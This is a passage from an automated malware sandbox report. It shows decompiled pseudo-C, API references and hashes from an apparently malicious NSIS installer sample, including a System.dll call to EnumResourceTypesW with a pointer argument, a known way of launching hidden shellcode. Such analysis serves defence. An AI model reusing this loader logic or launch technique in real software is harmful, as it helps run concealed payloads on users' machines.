									if(_t251 != (0 | _v36 == 0x00000003)) {
										L73:
										_v40 = 1;
									}
									goto L55;
								case 0x16:
									__eax =  &_v8;
									__eax = E10001A24( &_v8);
									__ebx = __eax;
									__ebx = __eax + 1;
									L84:
									if(__ebx == 0) {
										goto L55;
									}
									L85:
									_v40 = 1;
									if(_v20 == 0) {
										_v16 = _v16 << 5;
										_t134 = __esi + 0x82c; // 0x82c
										__edi = (_v16 << 5) + _t134;
										__eax =  *__edi;
										if(__eax <= 0xffffffff || __eax > 0x19) {
											__eax = GlobalFree(__eax);
										}
										 *__edi = __ebx;
									}
									if(_v20 == 1) {
										_v16 = _v16 << 5;
										 *((_v16 << 5) + __esi + 0x830) = __ebx;
									}
									goto L92;
								case 0x17:
									goto L55;
							}
						}
						_t252 = _t248 - 1;
						if(_t252 == 0) {
							_v16 = _t257;
							goto L68;
						}
						if(_t252 != 1) {
							goto L134;
						}
						_t278 = _t260 - 0x21;
						if(_t278 == 0) {
							_v12 =  ~_v12;
							goto L55;
						}
						_t279 = _t278 - 0x42;
						if(_t279 == 0) {
							L51:
							if(_v12 != 1) {
								 *(_t298 + 0x810) =  *(_t298 + 0x810) &  !0x00000001;
							} else {
								 *(_t298 + 0x810) =  *(_t298 + 0x810) | 1;
							}
							_v12 = 1;
							goto L55;
						}
						_t283 = _t279;
						if(_t283 == 0) {
							_push(0x20);
							L50:
							_pop(1);
							goto L51;
						}
						_t284 = _t283 - 9;
						if(_t284 == 0) {
							_push(8);
							goto L50;
						}
						_push(4);
						_pop(1);
						_t285 = _t284 - 1;
						if(_t285 == 0) {
							goto L51;
						}
						_t286 = _t285 - 1;
						if(_t286 == 0) {
							_push(0x10);
							goto L50;
						}
						if(_t286 != 0) {
							goto L55;
						}
						_push(0x40);
						goto L50;
					} else {
						_v32 = _t290;
						_v12 = 1;
						goto L13;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t298 == _t257 ||  *(_t298 + 0x80c) != _t257) {
					L148:
					return _t298;
				} else {
					_t202 =  *_t298 - 1;
					if(_t202 == 0) {
						_t171 = _t298 + 8; // 0x8
						_t293 = _t171;
						if( *_t293 != 0) {
							_t203 = GetModuleHandleA(_t293);
							 *(_t298 + 0x808) = _t203;
							if(_t203 != _t257) {
								L144:
								_t176 = _t298 + 0x408; // 0x408
								_t294 = _t176;
								_t204 = E100015C1( *(_t298 + 0x808), _t294);
								 *(_t298 + 0x80c) = _t204;
								if(_v48 != _t257 || _t204 == _t257) {
									_t294[lstrlenA(_t294)] = 0x41;
									_t206 = E100015C1( *(_t298 + 0x808), _t294);
									if(_t206 != _t257) {
										L138:
										 *(_t298 + 0x80c) = _t206;
										goto L148;
									}
									L147:
									 *(_t298 + 4) =  *(_t298 + 4) | 0xffffffff;
								}
								goto L148;
							}
							_t207 = LoadLibraryA(_t293);
							 *(_t298 + 0x808) = _t207;
							if(_t207 == _t257) {
								goto L147;
							}
							goto L144;
						}
						_t172 = _t298 + 0x408; // 0x408
						_t209 = E1000131B(_t172);
						 *(_t298 + 0x80c) = _t209;
						if(_t209 != _t257) {
							goto L148;
						}
						goto L147;
					}
					_t210 = _t202 - 1;
					if(_t210 == 0) {
						_t169 = _t298 + 0x408; // 0x408
						_t211 = _t169;
						if( *_t169 == 0) {
							goto L148;
						}
						_t206 = E1000131B(_t211);
						L137:
						goto L138;
					}
					if(_t210 != 1) {
						goto L148;
					}
					_t73 = _t298 + 8; // 0x8
					_t258 = _t73;
					_t295 = E1000131B(_t73);
					 *(_t298 + 0x808) = _t295;
					if(_t295 == 0) {
						goto L147;
					}
					 *(_t298 + 0x850) =  *(_t298 + 0x850) & 0x00000000;
					 *((intOrPtr*)(_t298 + 0x84c)) = E10001224(_t258);
					 *(_t298 + 0x83c) =  *(_t298 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t298 + 0x848)) = 1;
					 *((intOrPtr*)(_t298 + 0x838)) = 1;
					_t82 = _t298 + 0x408; // 0x408
					_t206 =  *(_t295->i + E1000131B(_t82) * 4);
					goto L137;
				}
			}

0x10001a8e
0x10001a91
0x10001a94
0x10001a97
0x10001a9a
0x10001a9d
0x10001aa0
0x10001aa2
0x10001aa5
0x10001aaa
0x10001aad
0x10001ab5
0x10001ab8
0x10001abd
0x10001ac0
0x10001ac3
0x10001ac3
0x10001aca
0x10001acb
0x10001ace
0x00000000
0x00000000
0x10001adb
0x10001add
0x10001ae2
0x10001ae4
0x10001b3d
0x10001b41
0x10001b44
0x10001b46
0x10001b68
0x10001b6d
0x10001b76
0x10001b7c
0x10001b7e
0x10001b84
0x10001b84
0x10001b8a
0x10001b8d
0x10001b8d
0x10001b90
0x10001b90
0x10001b96
0x10001b98
0x10001b9b
0x10001ba1
0x10001ba4
0x10001ba6
0x10001bac
0x10001baf
0x10001bdd
0x00000000
0x00000000
0x10001be4
0x10001be6
0x10001bf4
0x10001bf9
0x00000000
0x00000000
0x00000000
0x00000000
0x10001bff
0x10001bff
0x10001bff
0x10001c07
0x00000000
0x00000000
0x10001c09
0x10001c0b
0x10001c0f
0x00000000
0x00000000
0x00000000
0x10001c0f
0x10001c13
0x10001c15
0x10001c15
0x10001c1b
0x10001c23
0x10001c39
0x10001c25
0x10001c2b
0x10001c2e
0x10001c2e
0x00000000
0x10001bb1
0x10001bb1
0x10001bb2
0x10001bbe
0x10001bc2
0x10001bc8
0x10001bcc
0x10001cb2
0x10001cb5
0x10001cb8
0x10001cb8
0x10001cbf
0x00000000
0x00000000
0x00000000
0x10001cbf
0x10001bb4
0x10001bb5
0x00000000
0x00000000
0x10001bb8
0x00000000
0x00000000
0x00000000
0x10001bb8
0x10001baf
0x10001b49
0x10001b52
0x10001b55
0x10001b62
0x10001b62
0x10001b57
0x10001b57
0x00000000
0x10001b49
0x10001ae6
0x10001ae9
0x10001b35
0x10001b38
0x00000000
0x10001b38
0x10001aeb
0x10001aee
0x10001b1c
0x10001b23
0x10001b2a
0x10001b2d
0x10001b30
0x00000000
0x10001b30
0x10001af0
0x10001af1
0x10001b08
0x10001b0f
0x10001b12
0x00000000
0x10001b12
0x10001af6
0x10001c44
0x10001c46
0x10001f80
0x10001fe1
0x10001cb0
0x10001cb0
0x00000000
0x10001cb0
0x10001f85
0x10001f91
0x10001f94
0x10001f98
0x10001f9f
0x10001fa2
0x10001fa6
0x10001fed
0x10001ff0
0x10001ff3
0x00000000
0x10001fad
0x10001fad
0x10001fb4
0x10001fb4
0x10001fbd
0x10001fd9
0x10001fbf
0x10001fc8
0x10001fcb
0x10001fcb
0x00000000
0x10001fbd
0x10001fa6
0x10001f9a
0x00000000
0x10001f9a
0x10001f8a
0x00000000
0x00000000
0x10001f8f
0x00000000
0x00000000
0x00000000
0x10001f8f
0x10001c4c
0x10001c4d
0x10001d74
0x10001d74
0x10001d7c
0x00000000
0x00000000
0x10001d89
0x00000000
0x10001f25
0x10001f28
0x10001f2b
0x10001f2b
0x10001f2c
0x10001f2f
0x10001f33
0x00000000
0x00000000
0x10001f3c
0x00000000
0x00000000
0x10001f40
0x10001f42
0x10001f42
0x10001f43
0x10001f45
0x10001f47
0x10001f47
0x10001f4d
0x10001f56
0x00000000
0x00000000
0x10001dd0
0x00000000
0x00000000
0x10001ddc
0x00000000
0x00000000
0x10001dc3
0x10001dc7
0x10001dcb
0x00000000
0x00000000
0x10001efb
0x00000000
0x00000000
0x10001f01
0x10001f09
0x10001f10
0x10001f18
0x00000000
0x00000000
0x10001e94
0x10001e94
0x00000000
0x00000000
0x10001f75
0x00000000
0x00000000
0x10001f65
0x00000000
0x00000000
0x10001f69
0x00000000
0x00000000
0x10001f71
0x00000000
0x00000000
0x10001eb7
0x00000000
0x00000000
0x10001e9c
0x10001e9e
0x00000000
0x00000000
0x10001ebf
0x00000000
0x00000000
0x10001ea4
0x00000000
0x00000000
0x10001ea8
0x00000000
0x00000000
0x10001f6d
0x10001f77
0x10001f77
0x00000000
0x00000000
0x10001ec7
0x10001ecb
0x10001ed0
0x10001ed3
0x10001ed7
0x10001edd
0x10001edd
0x00000000
0x00000000
0x10001f5d
0x00000000
0x00000000
0x10001eac
0x10001eaf
0x10001eb1
0x00000000
0x00000000
0x10001de5
0x00000000
0x00000000
0x10001ebb
0x10001ec1
0x10001ec1
0x10001de7
0x10001de7
0x10001dea
0x10001df1
0x10001df4
0x10001df6
0x10001df8
0x10001dfd
0x10001e00
0x10001e06
0x10001e0c
0x10001e0c
0x10001e11
0x10001e17
0x10001e19
0x10001e1d
0x10001e24
0x10001e24
0x10001e27
0x10001e2a
0x10001e33
0x10001e36
0x10001e39
0x10001e3b
0x10001e3e
0x10001e44
0x00000000
0x00000000
0x10001d90
0x10001d99
0x10001d9b
0x10001d9b
0x10001d9e
0x10001da2
0x10001db1
0x10001db7
0x10001db7
0x10001db7
0x00000000
0x00000000
0x10001ee5
0x10001ee9
0x10001eee
0x10001ef1
0x10001e4a
0x10001e4c
0x00000000
0x00000000
0x10001e52
0x10001e56
0x10001e5d
0x10001e62
0x10001e65
0x10001e65
0x10001e6c
0x10001e71
0x10001e79
0x10001e79
0x10001e7f
0x10001e7f
0x10001e85
0x10001e8a
0x10001e8d
0x10001e8d
0x00000000
0x00000000
0x00000000
0x00000000
0x10001d89
0x10001c53
0x10001c54
0x10001d71
0x00000000
0x10001d71
0x10001c5b
0x00000000
0x00000000
0x10001c61
0x10001c64
0x10001cad
0x00000000
0x10001cad
0x10001c66
0x10001c69
0x10001c91
0x10001c97
0x10001d63
0x10001c9d
0x10001c9d
0x10001c9d
0x10001d69
0x00000000
0x10001d69
0x10001c6c
0x10001c6d
0x10001c8e
0x10001c90
0x10001c90
0x00000000
0x10001c90
0x10001c6f
0x10001c72
0x10001c8a
0x00000000
0x10001c8a
0x10001c74
0x10001c76
0x10001c77
0x10001c79
0x00000000
0x00000000
0x10001c7b
0x10001c7c
0x10001c86
0x00000000
0x10001c86
0x10001c80
0x00000000
0x00000000
0x10001c82
0x00000000
0x10001afc
0x10001afc
0x10001aff
0x00000000
0x10001aff
0x10001af6
0x10001cce
0x10001cd3
0x10001cd8
0x10001cdc
0x100020a8
0x100020ae
0x10001cee
0x10001cf0
0x10001cf1
0x1000201b
0x1000201b
0x10002021
0x1000203d
0x10002045
0x1000204b
0x1000205e
0x1000205e
0x1000205e
0x1000206b
0x10002075
0x1000207b
0x10002089
0x10002095
0x1000209e
0x10002010
0x10002010
0x00000000
0x10002010
0x100020a4
0x100020a4
0x100020a4
0x00000000
0x1000207b
0x1000204e
0x10002056
0x1000205c
0x00000000
0x00000000
0x00000000
0x1000205c
0x10002023
0x1000202a
0x10002032
0x10002038
0x00000000
0x00000000
0x00000000
0x1000203a
0x10001cf7
0x10001cf8
0x10001ffa
0x10001ffa
0x10002003
0x00000000
0x00000000
0x1000200a
0x1000200f
0x00000000
0x1000200f
0x10001cff
0x00000000
0x00000000
0x10001d05
0x10001d05
0x10001d0e
0x10001d13
0x10001d19
0x00000000
0x00000000
0x10001d1f
0x10001d2c
0x10001d32
0x10001d3c
0x10001d42
0x10001d4a
0x10001d5a
0x00000000
0x10001d5a

APIs

Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,00000001), ref: 1000121D

Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B76
lstrcpyA.KERNEL32(00000008,?), ref: 10001BC2
lstrcpyA.KERNEL32(00000408,?), ref: 10001BCC
GlobalFree.KERNEL32(00000000), ref: 10001BE6
GlobalFree.KERNEL32(?), ref: 10001CCE
GlobalFree.KERNEL32(?), ref: 10001CD3
GlobalFree.KERNEL32(?), ref: 10001CD8
GlobalFree.KERNEL32(00000000), ref: 10001E79
lstrcpyA.KERNEL32(?,?), ref: 10001FCB
GetModuleHandleA.KERNEL32(00000008), ref: 1000203D
LoadLibraryA.KERNEL32(00000008), ref: 1000204E
lstrlenA.KERNEL32(00000408), ref: 10002082

Memory Dump Source

Source File: 00000000.00000002.2999566321.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2999506923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999612936.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999647911.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_SC.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$HandleLibraryLoadModulelstrlen
String ID:
API String ID: 226667998-0
Opcode ID: 8ec8fb265bc8d5da7aa9ee2d86766b0fc4af6a504ffa790e167c9f5f819e0430
Instruction ID: dbefa70d923fed6e2c1f4067a34d9ed24c8bf5ef1377c6d65b2935cebb3f649c
Opcode Fuzzy Hash: 8ec8fb265bc8d5da7aa9ee2d86766b0fc4af6a504ffa790e167c9f5f819e0430
Instruction Fuzzy Hash: E0128971D0464ADEFB20CFA4C8817EEBBF4FB043D0F21852AE595E6189DB749A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E0040173F(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A07(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004056B2(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405645(E00405B98(0x409bc0, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91")), ??);
				} else {
					_push(0x409bc0);
					E00405B98();
				}
				E00405E03(0x409bc0);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E9C(0x409bc0);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405821(0x409bc0);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405846(0x409bc0, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404EA5(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42ec28;
						goto L32;
					} else {
						E00405B98(0x40a3c0, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)");
						E00405B98("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x409bc0);
						E00405BBA(_t75, 0x40a3c0, 0x409bc0, "C:\Users\Arthur\AppData\Local\Temp\nsc7F31.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405B98("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x40a3c0);
						_t62 = E004053C9("C:\Users\Arthur\AppData\Local\Temp\nsc7F31.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42ec28 =  &( *0x42ec28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409bc0);
								_push(0xfffffffa);
								E00404EA5();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404EA5(0xffffffea,  *(_t85 - 8));
				 *0x42ec54 =  *0x42ec54 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0x34));
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_t43 = E00402E6C(); // executed
				 *0x42ec54 =  *0x42ec54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409bc0, 0x409bc0, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409bc0, 0x409bc0, 0xffffffe9);
						lstrcatA(0x409bc0,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409bc0);
					E004053C9();
					goto L29;
				}
				goto L33;
			}

0x0040173f
0x00401746
0x0040174f
0x00401752
0x00401755
0x0040175a
0x00401762
0x0040177e
0x00401764
0x00401764
0x00401765
0x00401765
0x00401784
0x0040178e
0x0040178e
0x00401792
0x00401795
0x0040179a
0x0040179c
0x0040179e
0x004017a3
0x004017a3
0x004017ae
0x004017ae
0x004017bf
0x004017c1
0x004017c1
0x004017c2
0x004017c2
0x004017c5
0x004017c8
0x004017cb
0x004017cb
0x004017d2
0x004017e1
0x004017e6
0x004017e9
0x004017ec
0x00000000
0x00000000
0x004017ee
0x004017f1
0x0040184b
0x00401850
0x004015a8
0x0040266d
0x0040266d
0x0040289c
0x0040289f
0x0040289f
0x00000000
0x004017f3
0x004017f9
0x00401804
0x00401811
0x0040181c
0x00401832
0x00401832
0x00401835
0x00000000
0x0040183b
0x0040183b
0x0040183c
0x00401859
0x004028a5
0x004028a5
0x004028a5
0x0040183e
0x0040183e
0x0040183f
0x00401492
0x00402224
0x00402224
0x00402224
0x0040183c
0x00401835
0x004028a7
0x004028ab
0x004028ab
0x00401869
0x0040186e
0x00401874
0x00401875
0x00401876
0x00401879
0x0040187c
0x00401881
0x00401887
0x0040188b
0x0040188d
0x00401895
0x004018a1
0x0040188f
0x0040188f
0x00401893
0x00000000
0x00000000
0x00401893
0x004018aa
0x004018b0
0x004018b2
0x00000000
0x004018b8
0x004018b8
0x004018bb
0x004018d3
0x004018bd
0x004018c0
0x004018c9
0x004018c9
0x004018d8
0x004018dd
0x0040221f
0x00000000
0x0040221f
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91,00000000,00000000,00000031), ref: 0040177E
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91,00000000,00000000,00000031), ref: 004017A8

Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,0040317B,Bilsynssteder Setup,NSIS Error), ref: 00405BA5

Part of subcall function 00404EA5: lstrlenA.KERNEL32(00429800,00000000,0041B7D0,75DD23A0,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
Part of subcall function 00404EA5: lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,75DD23A0,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
Part of subcall function 00404EA5: lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,75DD23A0), ref: 00404F01
Part of subcall function 00404EA5: SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
Part of subcall function 00404EA5: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F39
Part of subcall function 00404EA5: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F53
Part of subcall function 00404EA5: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F61

Strings

kernel32::EnumResourceTypesW(i 0,i r1,i 0), xrefs: 004017F3, 004017FF, 00401817
Call, xrefs: 0040175B, 00401764, 00401771, 00401783, 00401794, 004017CA, 004017E0, 004017FE, 0040183E, 004018BF, 004018C8, 004018D2, 004018DD
C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dll, xrefs: 0040180C, 00401828
C:\Users\user\AppData\Local\Temp\nsc7F31.tmp, xrefs: 00401789, 004017F8, 00401816
C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91, xrefs: 0040176C

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91$C:\Users\user\AppData\Local\Temp\nsc7F31.tmp$C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dll$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
API String ID: 1941528284-1627340430
Opcode ID: 1365fbaad1701f3f5acf491b2e7367b99c08fa3fb0b06c24217b54d84fa2b958
Instruction ID: 3eee97e154c7fd254b8817dfe04a4aa8189c03b90b2994f5d00cea6654a5a112
Opcode Fuzzy Hash: 1365fbaad1701f3f5acf491b2e7367b99c08fa3fb0b06c24217b54d84fa2b958
Instruction Fuzzy Hash: CA41D932900614BADF10BBB5CD46DAF3679EF05369B20423BF511F11E2DA7C6A418BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402E6C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00402E6C(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418bd0;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ebf8; // 0x9994
					E004030C0(_t95 + _t65);
				}
				_t67 = E0040308E( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E0040308E(0x414bd0, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414bd0, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E0040308E(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b534 =  *0x40b534 & 0x00000000;
					 *0x40b530 =  *0x40b530 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b018 = 8;
					 *0x414bc0 = 0x40cbb8;
					 *0x414bbc = 0x40cbb8;
					 *0x414bb8 = 0x414bb8;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E0040308E(0x414bd0, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40b008 = 0x414bd0;
						 *0x40b00c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b010 = _t100;
							 *0x40b014 = _v12;
							_t79 = E00405FA3(0x40b008);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b010; // 0x41b7d0
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ec54 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404EA5(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40b010; // 0x41b7d0
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}

0x00402e74
0x00402e78
0x00402e7b
0x00402e80
0x00402e82
0x00402e82
0x00402e89
0x00402e8d
0x00402e92
0x00402e94
0x00402e94
0x00402e9b
0x00402ea0
0x00402ea2
0x00402eab
0x00402eab
0x00402eb6
0x00402ebd
0x00403039
0x00403039
0x00000000
0x00402ec3
0x00402ec7
0x00403024
0x00403079
0x0040303e
0x00403044
0x00403046
0x00403046
0x00403057
0x00000000
0x00403059
0x0040306c
0x0040301e
0x0040301e
0x0040303b
0x0040303b
0x00000000
0x00403073
0x00403073
0x00403076
0x00000000
0x00403076
0x0040306c
0x00403057
0x00403084
0x00000000
0x00403084
0x00403029
0x0040302b
0x0040302b
0x00403037
0x00403081
0x00000000
0x00000000
0x00000000
0x00000000
0x00403037
0x00402ed3
0x00402ed5
0x00402edc
0x00402ee3
0x00402ee3
0x00402eea
0x00402ef2
0x00402efc
0x00402f01
0x00402f09
0x00402f13
0x00402f16
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f1c
0x00402f1c
0x00402f1c
0x00402f24
0x00402f26
0x00402f26
0x00402f37
0x00000000
0x00000000
0x00402f3d
0x00402f40
0x00402f46
0x00402f4c
0x00402f4c
0x00402f57
0x00402f5d
0x00402f62
0x00402f69
0x00402f6c
0x00000000
0x00000000
0x00402f72
0x00402f78
0x00402f7a
0x00402f83
0x00402f85
0x00402fb3
0x00402fb9
0x00402fc2
0x00402fc7
0x00402fc7
0x00402fce
0x00403012
0x00000000
0x00000000
0x00000000
0x00402fd0
0x00402fd3
0x00402ff5
0x00402ffa
0x00402ffd
0x00403000
0x00403003
0x00403007
0x00000000
0x00000000
0x00000000
0x0040300d
0x00402fe1
0x00402fe9
0x00000000
0x00402ff0
0x00402ff0
0x00000000
0x00402ff0
0x00402fe9
0x00402fce
0x0040301a
0x00000000
0x0040301a
0x00000000
0x00402f1c

APIs

GetTickCount.KERNEL32 ref: 00402ED3
GetTickCount.KERNEL32 ref: 00402F7A
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FA3
wsprintfA.USER32 ref: 00402FB3
WriteFile.KERNELBASE(00000000,00000000,0041B7D0,7FFFFFFF,00000000), ref: 00402FE1

Strings

... %d%%, xrefs: 00402FAD

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
